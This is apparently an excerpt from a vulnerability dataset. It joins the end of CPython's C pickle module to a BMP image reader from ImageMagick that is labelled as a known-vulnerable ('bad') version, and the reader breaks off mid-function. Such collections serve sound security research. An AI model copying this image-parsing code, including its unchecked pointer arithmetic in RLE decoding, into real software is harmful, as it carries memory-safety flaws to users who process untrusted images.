arguments. Both methods should return bytes. Thus *file* can be a
binary file object opened for reading, an io.BytesIO object, or any
other custom object that meets this interface.
Optional keyword arguments are *fix_imports*, *encoding* and *errors*,
which are used to control compatibility support for pickle streams
generated by Python 2. If *fix_imports* is True, pickle will try to
map the old Python 2 names to the new names used in Python 3. The
*encoding* and *errors* tell pickle how to decode 8-bit string
instances pickled by Python 2; these default to 'ASCII' and 'strict',
respectively. The *encoding* can be 'bytes' to read these 8-bit
string instances as bytes objects.
[clinic start generated code]*/
static PyObject *
_pickle_load_impl(PyObject *module, PyObject *file, int fix_imports,
const char *encoding, const char *errors)
/*[clinic end generated code: output=69e298160285199e input=01b44dd3fc07afa7]*/
{
PyObject *result;
UnpicklerObject *unpickler = _Unpickler_New();
if (unpickler == NULL)
return NULL;
if (_Unpickler_SetInputStream(unpickler, file) < 0)
goto error;
if (_Unpickler_SetInputEncoding(unpickler, encoding, errors) < 0)
goto error;
unpickler->fix_imports = fix_imports;
result = load(unpickler);
Py_DECREF(unpickler);
return result;
error:
Py_XDECREF(unpickler);
return NULL;
}
/*[clinic input]
_pickle.loads
data: object
*
fix_imports: bool = True
encoding: str = 'ASCII'
errors: str = 'strict'
Read and return an object from the given pickle data.
The protocol version of the pickle is detected automatically, so no
protocol argument is needed. Bytes past the pickled object's
representation are ignored.
Optional keyword arguments are *fix_imports*, *encoding* and *errors*,
which are used to control compatibility support for pickle streams
generated by Python 2. If *fix_imports* is True, pickle will try to
map the old Python 2 names to the new names used in Python 3. The
*encoding* and *errors* tell pickle how to decode 8-bit string
instances pickled by Python 2; these default to 'ASCII' and 'strict',
respectively. The *encoding* can be 'bytes' to read these 8-bit
string instances as bytes objects.
[clinic start generated code]*/
static PyObject *
_pickle_loads_impl(PyObject *module, PyObject *data, int fix_imports,
const char *encoding, const char *errors)
/*[clinic end generated code: output=1e7cb2343f2c440f input=70605948a719feb9]*/
{
PyObject *result;
UnpicklerObject *unpickler = _Unpickler_New();
if (unpickler == NULL)
return NULL;
if (_Unpickler_SetStringInput(unpickler, data) < 0)
goto error;
if (_Unpickler_SetInputEncoding(unpickler, encoding, errors) < 0)
goto error;
unpickler->fix_imports = fix_imports;
result = load(unpickler);
Py_DECREF(unpickler);
return result;
error:
Py_XDECREF(unpickler);
return NULL;
}
static struct PyMethodDef pickle_methods[] = {
_PICKLE_DUMP_METHODDEF
_PICKLE_DUMPS_METHODDEF
_PICKLE_LOAD_METHODDEF
_PICKLE_LOADS_METHODDEF
{NULL, NULL} /* sentinel */
};
static int
pickle_clear(PyObject *m)
{
_Pickle_ClearState(_Pickle_GetState(m));
return 0;
}
static void
pickle_free(PyObject *m)
{
_Pickle_ClearState(_Pickle_GetState(m));
}
static int
pickle_traverse(PyObject *m, visitproc visit, void *arg)
{
PickleState *st = _Pickle_GetState(m);
Py_VISIT(st->PickleError);
Py_VISIT(st->PicklingError);
Py_VISIT(st->UnpicklingError);
Py_VISIT(st->dispatch_table);
Py_VISIT(st->extension_registry);
Py_VISIT(st->extension_cache);
Py_VISIT(st->inverted_registry);
Py_VISIT(st->name_mapping_2to3);
Py_VISIT(st->import_mapping_2to3);
Py_VISIT(st->name_mapping_3to2);
Py_VISIT(st->import_mapping_3to2);
Py_VISIT(st->codecs_encode);
Py_VISIT(st->getattr);
return 0;
}
static struct PyModuleDef _picklemodule = {
PyModuleDef_HEAD_INIT,
"_pickle", /* m_name */
pickle_module_doc, /* m_doc */
sizeof(PickleState), /* m_size */
pickle_methods, /* m_methods */
NULL, /* m_reload */
pickle_traverse, /* m_traverse */
pickle_clear, /* m_clear */
(freefunc)pickle_free /* m_free */
};
PyMODINIT_FUNC
PyInit__pickle(void)
{
PyObject *m;
PickleState *st;
m = PyState_FindModule(&_picklemodule);
if (m) {
Py_INCREF(m);
return m;
}
if (PyType_Ready(&Unpickler_Type) < 0)
return NULL;
if (PyType_Ready(&Pickler_Type) < 0)
return NULL;
if (PyType_Ready(&Pdata_Type) < 0)
return NULL;
if (PyType_Ready(&PicklerMemoProxyType) < 0)
return NULL;
if (PyType_Ready(&UnpicklerMemoProxyType) < 0)
return NULL;
/* Create the module and add the functions. */
m = PyModule_Create(&_picklemodule);
if (m == NULL)
return NULL;
Py_INCREF(&Pickler_Type);
if (PyModule_AddObject(m, "Pickler", (PyObject *)&Pickler_Type) < 0)
return NULL;
Py_INCREF(&Unpickler_Type);
if (PyModule_AddObject(m, "Unpickler", (PyObject *)&Unpickler_Type) < 0)
return NULL;
st = _Pickle_GetState(m);
/* Initialize the exceptions. */
st->PickleError = PyErr_NewException("_pickle.PickleError", NULL, NULL);
if (st->PickleError == NULL)
return NULL;
st->PicklingError = \
PyErr_NewException("_pickle.PicklingError", st->PickleError, NULL);
if (st->PicklingError == NULL)
return NULL;
st->UnpicklingError = \
PyErr_NewException("_pickle.UnpicklingError", st->PickleError, NULL);
if (st->UnpicklingError == NULL)
return NULL;
Py_INCREF(st->PickleError);
if (PyModule_AddObject(m, "PickleError", st->PickleError) < 0)
return NULL;
Py_INCREF(st->PicklingError);
if (PyModule_AddObject(m, "PicklingError", st->PicklingError) < 0)
return NULL;
Py_INCREF(st->UnpicklingError);
if (PyModule_AddObject(m, "UnpicklingError", st->UnpicklingError) < 0)
return NULL;
if (_Pickle_InitState(st) < 0)
return NULL;
return m;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_496_0 |
crossvul-cpp_data_bad_5223_1 | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% BBBB M M PPPP %
% B B MM MM P P %
% BBBB M M M PPPP %
% B B M M P %
% BBBB M M P %
% %
% %
% Read/Write Microsoft Windows Bitmap Image Format %
% %
% Software Design %
% Cristy %
% Glenn Randers-Pehrson %
% December 2001 %
% %
% %
% Copyright 1999-2016 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% http://www.imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%
*/
/*
Include declarations.
*/
#include "MagickCore/studio.h"
#include "MagickCore/blob.h"
#include "MagickCore/blob-private.h"
#include "MagickCore/cache.h"
#include "MagickCore/colormap-private.h"
#include "MagickCore/color-private.h"
#include "MagickCore/colormap.h"
#include "MagickCore/colorspace.h"
#include "MagickCore/colorspace-private.h"
#include "MagickCore/exception.h"
#include "MagickCore/exception-private.h"
#include "MagickCore/image.h"
#include "MagickCore/image-private.h"
#include "MagickCore/list.h"
#include "MagickCore/log.h"
#include "MagickCore/magick.h"
#include "MagickCore/memory_.h"
#include "MagickCore/monitor.h"
#include "MagickCore/monitor-private.h"
#include "MagickCore/option.h"
#include "MagickCore/pixel-accessor.h"
#include "MagickCore/profile.h"
#include "MagickCore/quantum-private.h"
#include "MagickCore/static.h"
#include "MagickCore/string_.h"
#include "MagickCore/module.h"
#include "MagickCore/transform.h"
/*
Macro definitions (from Windows wingdi.h).
*/
#undef BI_JPEG
#define BI_JPEG 4
#undef BI_PNG
#define BI_PNG 5
#if !defined(MAGICKCORE_WINDOWS_SUPPORT) || defined(__MINGW32__) || defined(__MINGW64__)
#undef BI_RGB
#define BI_RGB 0
#undef BI_RLE8
#define BI_RLE8 1
#undef BI_RLE4
#define BI_RLE4 2
#undef BI_BITFIELDS
#define BI_BITFIELDS 3
#undef LCS_CALIBRATED_RBG
#define LCS_CALIBRATED_RBG 0
#undef LCS_sRGB
#define LCS_sRGB 1
#undef LCS_WINDOWS_COLOR_SPACE
#define LCS_WINDOWS_COLOR_SPACE 2
#undef PROFILE_LINKED
#define PROFILE_LINKED 3
#undef PROFILE_EMBEDDED
#define PROFILE_EMBEDDED 4
#undef LCS_GM_BUSINESS
#define LCS_GM_BUSINESS 1 /* Saturation */
#undef LCS_GM_GRAPHICS
#define LCS_GM_GRAPHICS 2 /* Relative */
#undef LCS_GM_IMAGES
#define LCS_GM_IMAGES 4 /* Perceptual */
#undef LCS_GM_ABS_COLORIMETRIC
#define LCS_GM_ABS_COLORIMETRIC 8 /* Absolute */
#endif
/*
Typedef declarations.
*/
typedef struct _BMPInfo
{
unsigned long
file_size,
ba_offset,
offset_bits,
size;
ssize_t
width,
height;
unsigned short
planes,
bits_per_pixel;
unsigned long
compression,
image_size,
x_pixels,
y_pixels,
number_colors,
red_mask,
green_mask,
blue_mask,
alpha_mask,
colors_important;
long
colorspace;
PrimaryInfo
red_primary,
green_primary,
blue_primary,
gamma_scale;
} BMPInfo;
/*
Forward declarations.
*/
static MagickBooleanType
WriteBMPImage(const ImageInfo *,Image *,ExceptionInfo *);
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e c o d e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DecodeImage unpacks the packed, runlength-encoded image pixels into
% an uncompressed array of pixel bytes.
%
% The format of the DecodeImage method is:
%
% MagickBooleanType DecodeImage(Image *image,
% const size_t compression,unsigned char *pixels)
%
% A description of each parameter follows:
%
% o image: the address of a structure of type Image.
%
% o compression: Zero means uncompressed. A value of 1 means the
% compressed pixels are runlength encoded for a 256-color bitmap.
% A value of 2 means the pixels are runlength encoded for a 16-color
% bitmap. A value of 3 means bitfields encoding.
%
% o pixels: The address of a byte (8 bits) array of pixel data created by
% the decoding process.
%
*/
static MagickBooleanType DecodeImage(Image *image,const size_t compression,
unsigned char *pixels)
{
int
count;
register ssize_t
i,
x;
register unsigned char
*p,
*q;
ssize_t
y;
unsigned char
byte;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(pixels != (unsigned char *) NULL);
(void) ResetMagickMemory(pixels,0,(size_t) image->columns*image->rows*
sizeof(*pixels));
byte=0;
x=0;
p=pixels;
q=pixels+(size_t) image->columns*image->rows;
for (y=0; y < (ssize_t) image->rows; )
{
MagickBooleanType
status;
if ((p < pixels) || (p > q))
break;
count=ReadBlobByte(image);
if (count == EOF)
break;
if (count != 0)
{
/*
Encoded mode.
*/
count=(int) MagickMin((ssize_t) count,(ssize_t) (q-p));
byte=(unsigned char) ReadBlobByte(image);
if (compression == BI_RLE8)
{
for (i=0; i < (ssize_t) count; i++)
*p++=(unsigned char) byte;
}
else
{
for (i=0; i < (ssize_t) count; i++)
*p++=(unsigned char)
((i & 0x01) != 0 ? (byte & 0x0f) : ((byte >> 4) & 0x0f));
}
x+=count;
}
else
{
/*
Escape mode.
*/
count=ReadBlobByte(image);
if (count == EOF)
break;
if (count == 0x01)
return(MagickTrue);
switch (count)
{
case 0x00:
{
/*
End of line.
*/
x=0;
y++;
p=pixels+y*image->columns;
break;
}
case 0x02:
{
/*
Delta mode.
*/
x+=ReadBlobByte(image);
y+=ReadBlobByte(image);
p=pixels+y*image->columns+x;
break;
}
default:
{
/*
Absolute mode.
*/
count=(int) MagickMin((ssize_t) count,(ssize_t) (q-p));
if (compression == BI_RLE8)
for (i=0; i < (ssize_t) count; i++)
*p++=(unsigned char) ReadBlobByte(image);
else
for (i=0; i < (ssize_t) count; i++)
{
if ((i & 0x01) == 0)
byte=(unsigned char) ReadBlobByte(image);
*p++=(unsigned char)
((i & 0x01) != 0 ? (byte & 0x0f) : ((byte >> 4) & 0x0f));
}
x+=count;
/*
Read pad byte.
*/
if (compression == BI_RLE8)
{
if ((count & 0x01) != 0)
(void) ReadBlobByte(image);
}
else
if (((count & 0x03) == 1) || ((count & 0x03) == 2))
(void) ReadBlobByte(image);
break;
}
}
}
status=SetImageProgress(image,LoadImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
(void) ReadBlobByte(image); /* end of line */
(void) ReadBlobByte(image);
return(y < (ssize_t) image->rows ? MagickFalse : MagickTrue);
}
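/*
Illustrative sketch added for exposition (not part of the original
coder): expanding one BI_RLE8 "encoded mode" run in the same spirit as
the loop in DecodeImage() above, i.e. a count byte followed by a value
byte, clamped to the space remaining in the destination buffer. The
function name is an assumption made for this example only.
*/
static inline unsigned char *ExpandRLE8Run(unsigned char *q,
  const unsigned char *end,size_t count,const unsigned char value)
{
  /* Emit at most 'count' copies of 'value', never writing past 'end'. */
  while ((count-- != 0) && (q < end))
    *q++=value;
  return(q);
}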
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% E n c o d e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% EncodeImage compresses pixels using a runlength encoded format.
%
% The format of the EncodeImage method is:
%
% static MagickBooleanType EncodeImage(Image *image,
% const size_t bytes_per_line,const unsigned char *pixels,
% unsigned char *compressed_pixels)
%
% A description of each parameter follows:
%
% o image: The image.
%
% o bytes_per_line: the number of bytes in an uncompressed scanline of
% pixels.
%
% o pixels: The address of a byte (8 bits) array of pixel data to be
% compressed.
%
% o compressed_pixels: The address of a byte (8 bits) array of compressed
% pixel data.
%
*/
static size_t EncodeImage(Image *image,const size_t bytes_per_line,
const unsigned char *pixels,unsigned char *compressed_pixels)
{
MagickBooleanType
status;
register const unsigned char
*p;
register ssize_t
i,
x;
register unsigned char
*q;
ssize_t
y;
/*
Runlength encode pixels.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(pixels != (const unsigned char *) NULL);
assert(compressed_pixels != (unsigned char *) NULL);
p=pixels;
q=compressed_pixels;
i=0;
for (y=0; y < (ssize_t) image->rows; y++)
{
for (x=0; x < (ssize_t) bytes_per_line; x+=i)
{
/*
Determine runlength.
*/
for (i=1; ((x+i) < (ssize_t) bytes_per_line); i++)
if ((i == 255) || (*(p+i) != *p))
break;
*q++=(unsigned char) i;
*q++=(*p);
p+=i;
}
/*
End of line.
*/
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x00;
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
/*
End of bitmap.
*/
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x01;
return((size_t) (q-compressed_pixels));
}
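/*
Illustrative sketch added for exposition (not part of the original
coder): an upper bound on the output size of EncodeImage() above. In
the worst case every run has length one, so each input byte becomes a
(count,value) pair, plus two end-of-line bytes per row and two final
end-of-bitmap bytes; the rle_info allocation in WriteBMPImage() uses a
slightly larger bound. The function name is an assumption made for
this example only.
*/
static inline size_t MaxRLE8EncodedSize(const size_t bytes_per_line,
  const size_t rows)
{
  return(rows*(2*bytes_per_line+2)+2);
}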
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I s B M P %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IsBMP() returns MagickTrue if the image format type, identified by the
% magick string, is BMP.
%
% The format of the IsBMP method is:
%
% MagickBooleanType IsBMP(const unsigned char *magick,const size_t length)
%
% A description of each parameter follows:
%
% o magick: compare image format pattern against these bytes.
%
% o length: Specifies the length of the magick string.
%
*/
static MagickBooleanType IsBMP(const unsigned char *magick,const size_t length)
{
if (length < 2)
return(MagickFalse);
if ((LocaleNCompare((char *) magick,"BA",2) == 0) ||
(LocaleNCompare((char *) magick,"BM",2) == 0) ||
(LocaleNCompare((char *) magick,"IC",2) == 0) ||
(LocaleNCompare((char *) magick,"PI",2) == 0) ||
(LocaleNCompare((char *) magick,"CI",2) == 0) ||
(LocaleNCompare((char *) magick,"CP",2) == 0))
return(MagickTrue);
return(MagickFalse);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e a d B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ReadBMPImage() reads a Microsoft Windows bitmap image file, Version
% 2, 3 (for Windows or NT), or 4, and returns it. It allocates the memory
% necessary for the new Image structure and returns a pointer to the new
% image.
%
% The format of the ReadBMPImage method is:
%
% image=ReadBMPImage(image_info)
%
% A description of each parameter follows:
%
% o image_info: the image info.
%
% o exception: return any errors or warnings in this structure.
%
*/
static Image *ReadBMPImage(const ImageInfo *image_info,ExceptionInfo *exception)
{
BMPInfo
bmp_info;
Image
*image;
MagickBooleanType
status;
MagickOffsetType
offset,
start_position;
MemoryInfo
*pixel_info;
Quantum
index;
register Quantum
*q;
register ssize_t
i,
x;
register unsigned char
*p;
size_t
bit,
blue,
bytes_per_line,
green,
length,
red;
ssize_t
count,
y;
unsigned char
magick[12],
*pixels;
/*
Open image file.
*/
assert(image_info != (const ImageInfo *) NULL);
assert(image_info->signature == MagickCoreSignature);
if (image_info->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",
image_info->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
image=AcquireImage(image_info,exception);
status=OpenBlob(image_info,image,ReadBinaryBlobMode,exception);
if (status == MagickFalse)
{
image=DestroyImageList(image);
return((Image *) NULL);
}
/*
Determine if this a BMP file.
*/
(void) ResetMagickMemory(&bmp_info,0,sizeof(bmp_info));
bmp_info.ba_offset=0;
start_position=0;
count=ReadBlob(image,2,magick);
if (count != 2)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
do
{
PixelInfo
quantum_bits;
PixelPacket
shift;
size_t
profile_data,
profile_size;
/*
Verify BMP identifier.
*/
if (bmp_info.ba_offset == 0)
start_position=TellBlob(image)-2;
bmp_info.ba_offset=0;
while (LocaleNCompare((char *) magick,"BA",2) == 0)
{
bmp_info.file_size=ReadBlobLSBLong(image);
bmp_info.ba_offset=ReadBlobLSBLong(image);
bmp_info.offset_bits=ReadBlobLSBLong(image);
count=ReadBlob(image,2,magick);
if (count != 2)
break;
}
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule()," Magick: %c%c",
magick[0],magick[1]);
if ((count != 2) || ((LocaleNCompare((char *) magick,"BM",2) != 0) &&
(LocaleNCompare((char *) magick,"CI",2) != 0)))
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
bmp_info.file_size=ReadBlobLSBLong(image);
(void) ReadBlobLSBLong(image);
bmp_info.offset_bits=ReadBlobLSBLong(image);
bmp_info.size=ReadBlobLSBLong(image);
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule()," BMP size: %lu",
bmp_info.size);
if (bmp_info.size == 12)
{
/*
OS/2 BMP image file.
*/
(void) CopyMagickString(image->magick,"BMP2",MagickPathExtent);
bmp_info.width=(ssize_t) ((short) ReadBlobLSBShort(image));
bmp_info.height=(ssize_t) ((short) ReadBlobLSBShort(image));
bmp_info.planes=ReadBlobLSBShort(image);
bmp_info.bits_per_pixel=ReadBlobLSBShort(image);
bmp_info.x_pixels=0;
bmp_info.y_pixels=0;
bmp_info.number_colors=0;
bmp_info.compression=BI_RGB;
bmp_info.image_size=0;
bmp_info.alpha_mask=0;
if (image->debug != MagickFalse)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Format: OS/2 Bitmap");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Geometry: %.20gx%.20g",(double) bmp_info.width,(double)
bmp_info.height);
}
}
else
{
/*
Microsoft Windows BMP image file.
*/
if (bmp_info.size < 40)
ThrowReaderException(CorruptImageError,"NonOS2HeaderSizeError");
bmp_info.width=(ssize_t) ReadBlobLSBSignedLong(image);
bmp_info.height=(ssize_t) ReadBlobLSBSignedLong(image);
bmp_info.planes=ReadBlobLSBShort(image);
bmp_info.bits_per_pixel=ReadBlobLSBShort(image);
bmp_info.compression=ReadBlobLSBLong(image);
bmp_info.image_size=ReadBlobLSBLong(image);
bmp_info.x_pixels=ReadBlobLSBLong(image);
bmp_info.y_pixels=ReadBlobLSBLong(image);
bmp_info.number_colors=ReadBlobLSBLong(image);
bmp_info.colors_important=ReadBlobLSBLong(image);
profile_data=0;
profile_size=0;
if (image->debug != MagickFalse)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Format: MS Windows bitmap");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Geometry: %.20gx%.20g",(double) bmp_info.width,(double)
bmp_info.height);
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Bits per pixel: %.20g",(double) bmp_info.bits_per_pixel);
switch ((int) bmp_info.compression)
{
case BI_RGB:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_RGB");
break;
}
case BI_RLE4:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_RLE4");
break;
}
case BI_RLE8:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_RLE8");
break;
}
case BI_BITFIELDS:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_BITFIELDS");
break;
}
case BI_PNG:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_PNG");
break;
}
case BI_JPEG:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: BI_JPEG");
break;
}
default:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression: UNKNOWN (%lu)",bmp_info.compression);
}
}
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Number of colors: %lu",bmp_info.number_colors);
}
bmp_info.red_mask=ReadBlobLSBLong(image);
bmp_info.green_mask=ReadBlobLSBLong(image);
bmp_info.blue_mask=ReadBlobLSBLong(image);
if (bmp_info.size > 40)
{
double
gamma;
/*
Read color management information.
*/
bmp_info.alpha_mask=ReadBlobLSBLong(image);
bmp_info.colorspace=ReadBlobLSBSignedLong(image);
/*
Decode 2^30 fixed point formatted CIE primaries.
*/
# define BMP_DENOM ((double) 0x40000000)
bmp_info.red_primary.x=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.red_primary.y=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.red_primary.z=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.green_primary.x=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.green_primary.y=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.green_primary.z=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.blue_primary.x=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.blue_primary.y=(double) ReadBlobLSBLong(image)/BMP_DENOM;
bmp_info.blue_primary.z=(double) ReadBlobLSBLong(image)/BMP_DENOM;
gamma=bmp_info.red_primary.x+bmp_info.red_primary.y+
bmp_info.red_primary.z;
gamma=PerceptibleReciprocal(gamma);
bmp_info.red_primary.x*=gamma;
bmp_info.red_primary.y*=gamma;
image->chromaticity.red_primary.x=bmp_info.red_primary.x;
image->chromaticity.red_primary.y=bmp_info.red_primary.y;
gamma=bmp_info.green_primary.x+bmp_info.green_primary.y+
bmp_info.green_primary.z;
gamma=PerceptibleReciprocal(gamma);
bmp_info.green_primary.x*=gamma;
bmp_info.green_primary.y*=gamma;
image->chromaticity.green_primary.x=bmp_info.green_primary.x;
image->chromaticity.green_primary.y=bmp_info.green_primary.y;
gamma=bmp_info.blue_primary.x+bmp_info.blue_primary.y+
bmp_info.blue_primary.z;
gamma=PerceptibleReciprocal(gamma);
bmp_info.blue_primary.x*=gamma;
bmp_info.blue_primary.y*=gamma;
image->chromaticity.blue_primary.x=bmp_info.blue_primary.x;
image->chromaticity.blue_primary.y=bmp_info.blue_primary.y;
/*
Decode 16^16 fixed point formatted gamma_scales.
*/
bmp_info.gamma_scale.x=(double) ReadBlobLSBLong(image)/0x10000;
bmp_info.gamma_scale.y=(double) ReadBlobLSBLong(image)/0x10000;
bmp_info.gamma_scale.z=(double) ReadBlobLSBLong(image)/0x10000;
/*
Compute a single gamma from the BMP 3-channel gamma.
*/
image->gamma=(bmp_info.gamma_scale.x+bmp_info.gamma_scale.y+
bmp_info.gamma_scale.z)/3.0;
}
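/*
Worked example (added for exposition): the CIE primaries above are
stored as unsigned 2.30 fixed point, so a stored value of 0x26666666
decodes to 0x26666666/0x40000000, roughly 0.60, while the gamma scales
use 16.16 fixed point, so 0x00026666 decodes to 0x00026666/0x10000,
roughly 2.4.
*/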
else
(void) CopyMagickString(image->magick,"BMP3",MagickPathExtent);
if (bmp_info.size > 108)
{
size_t
intent;
/*
Read BMP Version 5 color management information.
*/
intent=ReadBlobLSBLong(image);
switch ((int) intent)
{
case LCS_GM_BUSINESS:
{
image->rendering_intent=SaturationIntent;
break;
}
case LCS_GM_GRAPHICS:
{
image->rendering_intent=RelativeIntent;
break;
}
case LCS_GM_IMAGES:
{
image->rendering_intent=PerceptualIntent;
break;
}
case LCS_GM_ABS_COLORIMETRIC:
{
image->rendering_intent=AbsoluteIntent;
break;
}
}
profile_data=ReadBlobLSBLong(image);
profile_size=ReadBlobLSBLong(image);
(void) profile_data;
(void) profile_size;
(void) ReadBlobLSBLong(image); /* Reserved byte */
}
}
if ((MagickSizeType) bmp_info.file_size > GetBlobSize(image))
(void) ThrowMagickException(exception,GetMagickModule(),CorruptImageError,
"LengthAndFilesizeDoNotMatch","`%s'",image->filename);
else
if ((MagickSizeType) bmp_info.file_size < GetBlobSize(image))
(void) ThrowMagickException(exception,GetMagickModule(),
CorruptImageWarning,"LengthAndFilesizeDoNotMatch","`%s'",
image->filename);
if (bmp_info.width <= 0)
ThrowReaderException(CorruptImageError,"NegativeOrZeroImageSize");
if (bmp_info.height == 0)
ThrowReaderException(CorruptImageError,"NegativeOrZeroImageSize");
if (bmp_info.planes != 1)
ThrowReaderException(CorruptImageError,"StaticPlanesValueNotEqualToOne");
if ((bmp_info.bits_per_pixel != 1) && (bmp_info.bits_per_pixel != 4) &&
(bmp_info.bits_per_pixel != 8) && (bmp_info.bits_per_pixel != 16) &&
(bmp_info.bits_per_pixel != 24) && (bmp_info.bits_per_pixel != 32))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
if (bmp_info.bits_per_pixel < 16 &&
bmp_info.number_colors > (1U << bmp_info.bits_per_pixel))
ThrowReaderException(CorruptImageError,"UnrecognizedNumberOfColors");
if ((bmp_info.compression == 1) && (bmp_info.bits_per_pixel != 8))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
if ((bmp_info.compression == 2) && (bmp_info.bits_per_pixel != 4))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
if ((bmp_info.compression == 3) && (bmp_info.bits_per_pixel < 16))
ThrowReaderException(CorruptImageError,"UnrecognizedBitsPerPixel");
switch (bmp_info.compression)
{
case BI_RGB:
image->compression=NoCompression;
break;
case BI_RLE8:
case BI_RLE4:
image->compression=RLECompression;
break;
case BI_BITFIELDS:
break;
case BI_JPEG:
ThrowReaderException(CoderError,"JPEGCompressNotSupported");
case BI_PNG:
ThrowReaderException(CoderError,"PNGCompressNotSupported");
default:
ThrowReaderException(CorruptImageError,"UnrecognizedImageCompression");
}
image->columns=(size_t) MagickAbsoluteValue(bmp_info.width);
image->rows=(size_t) MagickAbsoluteValue(bmp_info.height);
image->depth=bmp_info.bits_per_pixel <= 8 ? bmp_info.bits_per_pixel : 8;
image->alpha_trait=((bmp_info.alpha_mask != 0) &&
(bmp_info.compression == BI_BITFIELDS)) ? BlendPixelTrait :
UndefinedPixelTrait;
if (bmp_info.bits_per_pixel < 16)
{
size_t
one;
image->storage_class=PseudoClass;
image->colors=bmp_info.number_colors;
one=1;
if (image->colors == 0)
image->colors=one << bmp_info.bits_per_pixel;
}
if (image->storage_class == PseudoClass)
{
unsigned char
*bmp_colormap;
size_t
packet_size;
/*
Read BMP raster colormap.
*/
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Reading colormap of %.20g colors",(double) image->colors);
if (AcquireImageColormap(image,image->colors,exception) == MagickFalse)
ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
bmp_colormap=(unsigned char *) AcquireQuantumMemory((size_t)
image->colors,4*sizeof(*bmp_colormap));
if (bmp_colormap == (unsigned char *) NULL)
ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
if ((bmp_info.size == 12) || (bmp_info.size == 64))
packet_size=3;
else
packet_size=4;
offset=SeekBlob(image,start_position+14+bmp_info.size,SEEK_SET);
if (offset < 0)
ThrowReaderException(CorruptImageError,"ImproperImageHeader");
count=ReadBlob(image,packet_size*image->colors,bmp_colormap);
